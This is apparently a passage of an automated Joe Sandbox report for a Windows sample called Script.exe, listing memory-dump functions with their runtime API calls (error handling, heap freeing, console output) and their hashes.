                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: bee3d8aa8748b85bd2cad431ddc7f782d34971028dea822443ab79bb27172c00
                                                                                    • Instruction ID: 9af4013e8efc963428bc2d7a4382e30a5563f4428cb947c9bfd3e6a8fc02de58
                                                                                    • Opcode Fuzzy Hash: bee3d8aa8748b85bd2cad431ddc7f782d34971028dea822443ab79bb27172c00
                                                                                    • Instruction Fuzzy Hash: 9FF03C71404A05BB8A90CAD8E595E9F33DEBF0AA607748C05F129D7900CB30F9805AAA
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID: *?
                                                                                    • API String ID: 269201875-2564092906
                                                                                    • Opcode ID: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                                                    • Instruction ID: 75908e67ef142ec28a78f7d2ec36fb447468cee3aa0f1e6716361162af0bd7e8
                                                                                    • Opcode Fuzzy Hash: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
                                                                                    • Instruction Fuzzy Hash: BA615B75E00219AFDB14CFE8C880AEDFBF9FF49754B24816AD814E7304D7719A428B91
                                                                                    APIs
                                                                                      • Part of subcall function 6E0C4BB9: _free.LIBCMT ref: 6E0C4BC7
                                                                                      • Part of subcall function 6E0C578D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6E0C7803,?,00000000,00000000), ref: 6E0C5839
                                                                                    • GetLastError.KERNEL32 ref: 6E0C45FF
                                                                                    • __dosmaperr.LIBCMT ref: 6E0C4606
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6E0C4645
                                                                                    • __dosmaperr.LIBCMT ref: 6E0C464C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                    • String ID:
                                                                                    • API String ID: 167067550-0
                                                                                    • Opcode ID: 4dbdc9e64f597ddd7087fd262375458b72436caacffdb008af0ec365c07034f8
                                                                                    • Instruction ID: c7f99d597983cdced6c82cd635c553bf2affff413ec2dd0a742ae02f3076a12a
                                                                                    • Opcode Fuzzy Hash: 4dbdc9e64f597ddd7087fd262375458b72436caacffdb008af0ec365c07034f8
                                                                                    • Instruction Fuzzy Hash: E921AE71604206BF9B109FE58880F9EB7BDFE41BA87108918F924D7144D730EC528BA2
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,?,6E0C81A7,?,00000001,6E0C65B4,?,6E0C8661,00000001,?,?,?,6E0C6543,?,00000000), ref: 6E0C3E9C
                                                                                    • _free.LIBCMT ref: 6E0C3EF9
                                                                                    • _free.LIBCMT ref: 6E0C3F2F
                                                                                    • SetLastError.KERNEL32(00000000,00000013,000000FF,?,6E0C8661,00000001,?,?,?,6E0C6543,?,00000000,00000000,6E0D1360,0000002C,6E0C65B4), ref: 6E0C3F3A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_free
                                                                                    • String ID:
                                                                                    • API String ID: 2283115069-0
                                                                                    • Opcode ID: bb58acf98c1d071f51dcf5de44dc0c3365d5832baeda67f0325763cddc13929d
                                                                                    • Instruction ID: 905bebbce091e8c7dd7505217c428cca3ebfc7bf5a237149ad4eb524a7085024
                                                                                    • Opcode Fuzzy Hash: bb58acf98c1d071f51dcf5de44dc0c3365d5832baeda67f0325763cddc13929d
                                                                                    • Instruction Fuzzy Hash: 9F110A392245016ED74116F54CCDF9F26AEEBCEFB9B240E64F124975C4EF7588025213
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00000001,6E0C4428,6E0C44B9,?,?,6E0C36CC), ref: 6E0C3FF3
                                                                                    • _free.LIBCMT ref: 6E0C4050
                                                                                    • _free.LIBCMT ref: 6E0C4086
                                                                                    • SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6E0C4428,6E0C44B9,?,?,6E0C36CC), ref: 6E0C4091
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_free
                                                                                    • String ID:
                                                                                    • API String ID: 2283115069-0
                                                                                    • Opcode ID: 912197465d1e47a80620725bd3a290066cb4d672ce4e4e60a0a06de00d36dc69
                                                                                    • Instruction ID: 4128fdc67a5eed369eb9a2a5c96cdb2f6a45419d9160f31050ca82c84c52c069
                                                                                    • Opcode Fuzzy Hash: 912197465d1e47a80620725bd3a290066cb4d672ce4e4e60a0a06de00d36dc69
                                                                                    • Instruction Fuzzy Hash: 6E11A03A248A017E9B1116F98D85B9F269EFB86FB9B750A24F524975C0EE728C025122
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6E0C8E50,?,00000001,?,00000001,?,6E0C8136,?,?,00000001), ref: 6E0C940D
                                                                                    • GetLastError.KERNEL32(?,6E0C8E50,?,00000001,?,00000001,?,6E0C8136,?,?,00000001,?,00000001,?,6E0C8682,6E0C6543), ref: 6E0C9419
                                                                                      • Part of subcall function 6E0C93DF: CloseHandle.KERNEL32(FFFFFFFE,6E0C9429,?,6E0C8E50,?,00000001,?,00000001,?,6E0C8136,?,?,00000001,?,00000001), ref: 6E0C93EF
                                                                                    • ___initconout.LIBCMT ref: 6E0C9429
                                                                                      • Part of subcall function 6E0C93A1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E0C93D0,6E0C8E3D,00000001,?,6E0C8136,?,?,00000001,?), ref: 6E0C93B4
                                                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6E0C8E50,?,00000001,?,00000001,?,6E0C8136,?,?,00000001,?), ref: 6E0C943E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: d33cd26767cf3946fcffbd20e74c84091c4b57dec81404f534d125192459a89e
                                                                                    • Instruction ID: 1695af691b996e521bdbb9d2e80376ff448d6dd461b99c6962f0593e1bedf51a
                                                                                    • Opcode Fuzzy Hash: d33cd26767cf3946fcffbd20e74c84091c4b57dec81404f534d125192459a89e
                                                                                    • Instruction Fuzzy Hash: 80F01C36010555BBCF121FD5CC49BCD3F66EF09BE4B514010FA2896520C7328820EB92
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 6E0C37CD
                                                                                      • Part of subcall function 6E0C4493: HeapFree.KERNEL32(00000000,00000000,?,6E0C36CC), ref: 6E0C44A9
                                                                                      • Part of subcall function 6E0C4493: GetLastError.KERNEL32(?,?,6E0C36CC), ref: 6E0C44BB
                                                                                    • _free.LIBCMT ref: 6E0C37E0
                                                                                    • _free.LIBCMT ref: 6E0C37F1
                                                                                    • _free.LIBCMT ref: 6E0C3802
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 0d20653df8a8eb9f36bd63b6c5fc3d6c099eedf20810d7c4b86212da95cfb1c6
                                                                                    • Instruction ID: 3c2e2455abe3d772f1eea3915690e32c2d1a915d414be6e39f8eb15447cf2153
                                                                                    • Opcode Fuzzy Hash: 0d20653df8a8eb9f36bd63b6c5fc3d6c099eedf20810d7c4b86212da95cfb1c6
                                                                                    • Instruction Fuzzy Hash: C7E01A74410E20BA9E511F509E0189E3A2BFB1FA64326C916E41C0AA14E7350593BF9E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: C:\Users\user\Desktop\Script.exe
                                                                                    • API String ID: 0-3474726233
                                                                                    • Opcode ID: d76144e604a5a10699ce304b8b0929c26fcacdec8c2b5074cd325933829cbd7b
                                                                                    • Instruction ID: 3056ff323a30a77d8a275bdc355cb95695d992a774037f69ff4cc15de2ae76aa
                                                                                    • Opcode Fuzzy Hash: d76144e604a5a10699ce304b8b0929c26fcacdec8c2b5074cd325933829cbd7b
                                                                                    • Instruction Fuzzy Hash: 3241A071A14619FFDB11CBD9C885ADEBBFDEF8EB10B2044A6E814D7200D7748A419B92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9a0000_Script.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (@$ (@$P(@$`(@
                                                                                    • API String ID: 0-2734072629
                                                                                    • Opcode ID: 6c4d8916def746100d32b1070d1f80695f1ae45d3da4813f23de2e76d637deaa
                                                                                    • Instruction ID: 6067270fed8268318751b53f2f2ea510f841618e48f8b451a62f54709c15865a
                                                                                    • Opcode Fuzzy Hash: 6c4d8916def746100d32b1070d1f80695f1ae45d3da4813f23de2e76d637deaa
                                                                                    • Instruction Fuzzy Hash: C2313A71A00B448FD734DF1AC588B13B7E4BB44314F548A2DD5964BAA1D7BAF988CF81